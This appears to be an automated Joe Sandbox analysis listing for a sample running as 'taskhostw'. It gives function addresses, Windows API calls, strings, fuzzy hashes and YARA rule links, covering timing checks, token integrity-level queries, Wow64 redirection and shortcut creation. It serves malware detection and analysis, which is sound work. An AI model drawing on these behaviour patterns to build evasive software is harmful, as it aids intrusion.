Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 19cf23312361ac208cb303c57d8ee74e7bf00a7cfb76d42d3cb08849726702e0
Instruction ID: 48e8649b94286306395ad2763050e28bf1c1a77b87617ab5bcf58a0dddd24546
Opcode Fuzzy Hash: 19cf23312361ac208cb303c57d8ee74e7bf00a7cfb76d42d3cb08849726702e0
Instruction Fuzzy Hash: 24016D71200304FFDB214FA6DC48D6B7FACFF89395B54052AF889C2220EA328D90DA70

Function 00D552EB Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D55307
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00D55315
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D5531D
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00D55327
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D55363

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 24b6af47da220064d2bcf4698598ed35a174ee9ddfe1bdf7ca6311e5f17ffdca
Instruction ID: 7793fd1eda5223ae35c4f53f8a700e8eadaed7d99eabf1922d852b06f1dcc01f
Opcode Fuzzy Hash: 24b6af47da220064d2bcf4698598ed35a174ee9ddfe1bdf7ca6311e5f17ffdca
Instruction Fuzzy Hash: D9013931C01A19DBDF119BA4E8989EDBBB8FB08312F45045AEC59F2244DB709554C7B1

Function 00D483D1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D483E8
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D483F2
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D48401
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D48408
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D4841E

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 31fb85d975be855de3e12355439961d99b6442299de024703a7c96277ac7bff9
Instruction ID: dbff347a8770719974b73f709da7e38d34a7b0d77dfd023dd0a5511119d336a7
Opcode Fuzzy Hash: 31fb85d975be855de3e12355439961d99b6442299de024703a7c96277ac7bff9
Instruction Fuzzy Hash: DAF04931204305EFEB205FA5EC89E7B7BADFF89794F440429F94DC6250EA619C81EA70

Function 00D48432 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D48449
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D48453
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D48462
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D48469
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D4847F

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 6a0c9dc4c63f361be2d1413396ab4036eee595a6567f571042fd40d42be74529
Instruction ID: 29ad1686af3d502a199861f5f83e42f217f14eb84ac9d7665b30100bd19ef59c
Opcode Fuzzy Hash: 6a0c9dc4c63f361be2d1413396ab4036eee595a6567f571042fd40d42be74529
Instruction Fuzzy Hash: 4CF04F35200305AFEB211FA5EC89E6B3BADFF49794F080125F98DC7250DA619985EA70

Function 00D4C4A5 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00D4C4B9
GetWindowTextW.USER32(00000000,?,00000100), ref: 00D4C4D0
MessageBeep.USER32(00000000), ref: 00D4C4E8
KillTimer.USER32 ref: 00D4C504
EndDialog.USER32 ref: 00D4C51E

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: b09c25895dcd56e3bcd4f07ce31d51d33304b2530cdeb3efd21302876504a37a
Instruction ID: 6f93d906210170b832c1fcc461c52117a8666f00fb9a8488fde822e3cedc2383
Opcode Fuzzy Hash: b09c25895dcd56e3bcd4f07ce31d51d33304b2530cdeb3efd21302876504a37a
Instruction Fuzzy Hash: D9018630511704ABEB305B20DD4EFAA77B8FF00705F040669F68AE11E1EBF0B9948BA1

Function 00CF13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00CF13BF
StrokeAndFillPath.GDI32(?), ref: 00CF13DB
SelectObject.GDI32(?,00000000), ref: 00CF13EE
DeleteObject.GDI32 ref: 00CF1401
StrokePath.GDI32(?), ref: 00CF141C

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 8c7f983a4f8d4144c39c1e2039be5c3729e7ed7430c2321334789037bb7d7ae7
Instruction ID: 0545fe653d4a615a4ec366a3ea3287b1045146b3cd744db4d282bcddce164bc6
Opcode Fuzzy Hash: 8c7f983a4f8d4144c39c1e2039be5c3729e7ed7430c2321334789037bb7d7ae7
Instruction Fuzzy Hash: D4F0C934004B08EBDB625F26FC4C7A83FA5A741326F488325E92DD92F5D7314995DF61

Function 00D5C423 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00D5C4BE
CoCreateInstance.OLE32(00D82D6C,00000000,00000001,00D82BDC,?), ref: 00D5C4D6

Part of subcall function 00CF7F41: _memmove.LIBCMT ref: 00CF7F82

CoUninitialize.OLE32 ref: 00D5C743

Strings

.lnk, xrefs: 00D5C452, 00D5C47A, 00D5C484

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 9d4ef03e27036f661f8db1dc28ad86c908fcb751b008b701dc01e1b86b5178e0
Instruction ID: 31978844a23141c769aec9509ffed5ed7fb5db09ad45561d5648fa563faaba8b
Opcode Fuzzy Hash: 9d4ef03e27036f661f8db1dc28ad86c908fcb751b008b701dc01e1b86b5178e0
Instruction Fuzzy Hash: 54A11B71108205AFD740EF54C891EBBB7E8EF98704F00491CF656971A2EB70EA49DB63

Function 00D02E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00D10F36: std::exception::exception.LIBCMT ref: 00D10F6C
Part of subcall function 00D10F36: __CxxThrowException@8.LIBCMT ref: 00D10F81

Part of subcall function 00CF7F41: _memmove.LIBCMT ref: 00CF7F82

Part of subcall function 00CF7BB1: _memmove.LIBCMT ref: 00CF7C0B

__swprintf.LIBCMT ref: 00D0302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00D02EC6

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: ddb7b2c34d7ae5555792059a23b7172dceeea5cb8e85ce3b1df0dcbb7396259c
Instruction ID: f69344c26f79046e21caf36089ac1da85ee3b2374d8f393143438e29433d1ec3
Opcode Fuzzy Hash: ddb7b2c34d7ae5555792059a23b7172dceeea5cb8e85ce3b1df0dcbb7396259c
Instruction Fuzzy Hash: 03918C71109205AFC718EF24D896D7FB7A8EF85700F04491DF9869B2A1DA70EE44DB72

Function 02A9225B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 02AA0336: std::exception::exception.LIBCMT ref: 02AA036C
Part of subcall function 02AA0336: __CxxThrowException@8.LIBCMT ref: 02AA0381

Part of subcall function 02A87341: _memmove.LIBCMT ref: 02A87382

Part of subcall function 02A86FB1: _memmove.LIBCMT ref: 02A8700B

__swprintf.LIBCMT ref: 02A9242D

Strings

(+I, xrefs: 02A92454, 02A924B1, 02A92458

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: (+I
API String ID: 1943609520-2960116247
Opcode ID: a7d44465125579725e7362245ab52375a465db34ca9b10e291d2563ebfeac19e
Instruction ID: 63e4b6fb59d52f61310330bd84b827e22f6e7d3705aae290f8e23e3acab036e7
Opcode Fuzzy Hash: a7d44465125579725e7362245ab52375a465db34ca9b10e291d2563ebfeac19e
Instruction Fuzzy Hash: 30915C71558201AFDB14EF24CA94A6EB7F9EF89B04F10496DF8569B2A0DF20ED04CF52

Function 00D1518D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00D1521D

Part of subcall function 00D20270: __87except.LIBCMT ref: 00D202AB

Strings

pow, xrefs: 00D151F5, 00D15212

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: bb84195d9abbdae5004efcd64f86472f4be03440a460fdb48f5af61b96409c9b
Instruction ID: 09609a557b022ed368d58eb6d3bc6f22b0285aab76e9fa202f238b86edd1fe7f
Opcode Fuzzy Hash: bb84195d9abbdae5004efcd64f86472f4be03440a460fdb48f5af61b96409c9b
Instruction Fuzzy Hash: B0517B32A1C601E7DB11B714F8413FE2F94EB90714F288958E4D5822AEEF38CCC4967A

Function 00D1017B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00D101B7
#, xrefs: 00D101C0

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: aa1ee7bf17687aa6ad4bad26d9a021d18b201a913c13638bbee086865d10e325
Instruction ID: 67c646b662d9a5221d418bc7fd51c722e007c6ae1a8fc90aa805b48a81a15521
Opcode Fuzzy Hash: aa1ee7bf17687aa6ad4bad26d9a021d18b201a913c13638bbee086865d10e325
Instruction Fuzzy Hash: 22512535104659AFCF25EF28E484BFA7BA4EF26310F184055EC919B292DB74DC82C771

Function 00D062F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D063A8
_memmove.LIBCMT ref: 00D06444
_memset.LIBCMT ref: 00D06468

Strings

ERCP, xrefs: 00D06313

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: e1633c227341091f07158bf0ba010e4351ba18f674821c6ab90baa25bd82274b
Instruction ID: 359e64795934d2e050f2e1456e4c623bfb79361a88498eff44a1a908260d13a2
Opcode Fuzzy Hash: e1633c227341091f07158bf0ba010e4351ba18f674821c6ab90baa25bd82274b
Instruction Fuzzy Hash: 2951A271904309DBDB24CF55C9817AAB7F4FF04314F24856EE54ACB281E771EA94CBA0

Function 00D76CE2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00D76D6D
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00D76D7D
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D76DA2

Strings

Listbox, xrefs: 00D76D3A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: a80bf33cc54fadf2139c5faa49e59f9e075e23c2e3fe4f83ec20b255fde3eea8
Instruction ID: 83cd8b39865f9b0e6c0d5ef7cfd9491470daeaf72aaefde2043c7be4dc0dd308
Opcode Fuzzy Hash: a80bf33cc54fadf2139c5faa49e59f9e075e23c2e3fe4f83ec20b255fde3eea8
Instruction Fuzzy Hash: 19218032710218BFDF258F54DC85FAB3BAAEB89764F158124F9089B190E671EC5197B0

Function 02B0AA69 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02B0AA78
_memset.LIBCMT ref: 02B0AA87

Strings

oL, xrefs: 02B0AA72
doL, xrefs: 02B0AA81

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _memset
String ID: oL$doL
API String ID: 2102423945-3421622115
Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
Instruction ID: be14bcd73f2ee32eeb2738768d2e1895288532490e01797882aa059500961102
Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
Instruction Fuzzy Hash: DFF05EB2640304BAE2506761BC15FBB7A5DEB09354F018439BE08D61A1D77598108BBC

Function 00D691F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00D69203
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW,?,00D7F910), ref: 00D69215

Strings

kernel32.dll, xrefs: 00D691FE
GetModuleHandleExW, xrefs: 00D6920F

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 8790804daac2cdbe92472db9eafbdc8b7eacb38e8cdd1f818f6fceabcf80351d
Instruction ID: 80dfdfed95309094103440c9a9dd1be71e644c74e845c34d7c481024eb96e15a
Opcode Fuzzy Hash: 8790804daac2cdbe92472db9eafbdc8b7eacb38e8cdd1f818f6fceabcf80351d
Instruction Fuzzy Hash: 49D01731554713DFDB309F31DD28616B6E9AF09351F55C83A9D8AD6A90FA70C8D0CA70

Function 00CF4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00CF4CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,00CF4C2E), ref: 00CF4CB5

Strings

GetNativeSystemInfo, xrefs: 00CF4CAF
kernel32.dll, xrefs: 00CF4C9E

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 19e936fee117f4a3916207aec6ce86e4100f7553a07c7fa76b593d2a8ed75040
Instruction ID: 1e4f014a30803478c093763c37b3c29f50765f0cd43d01812ab9b580ce0e71cd
Opcode Fuzzy Hash: 19e936fee117f4a3916207aec6ce86e4100f7553a07c7fa76b593d2a8ed75040
Instruction Fuzzy Hash: F2D01731610727CFD7309F31DA1861676E5AF05791F51D83A989AD6250F670D8C0CA61

Function 00CF4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00CF4DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00CF4DB4

Strings

Wow64RevertWow64FsRedirection, xrefs: 00CF4DAE
kernel32.dll, xrefs: 00CF4D9D

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 2159f072ab3a284e917c2618e0f7c0f3d132a115a27d9d7a5aea017e97ff1c97
Instruction ID: 09be7034d64411181a725b6d3fd5160ef8b389bc409ce8b79df1c48c75e3ead3
Opcode Fuzzy Hash: 2159f072ab3a284e917c2618e0f7c0f3d132a115a27d9d7a5aea017e97ff1c97
Instruction Fuzzy Hash: 3DD01731950713CFD7349F31D808A5676E5AF05355F51C83AD8DAD6260F770D8C0CA61

Function 00CF4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00CF4D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,00DB52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00CF4D81

Strings

kernel32.dll, xrefs: 00CF4D6A
Wow64DisableWow64FsRedirection, xrefs: 00CF4D7B

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 860f478c8f94e6404c3c0997b774e083e4cf2d21d78621a135abf6ff82e6d124
Instruction ID: 08ef20de391c9ab1c4ac632afb6e026309fbd7b790637408a464ad0ddd4d16af
Opcode Fuzzy Hash: 860f478c8f94e6404c3c0997b774e083e4cf2d21d78621a135abf6ff82e6d124
Instruction Fuzzy Hash: 9DD01731911713CFD7349F31D80862A76E8AF15352F51C83A989AD6260F670D8C0CA62

Function 00D70E72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 00D70E80
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D70E92

Strings

RegDeleteKeyExW, xrefs: 00D70E8C
advapi32.dll, xrefs: 00D70E7B

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

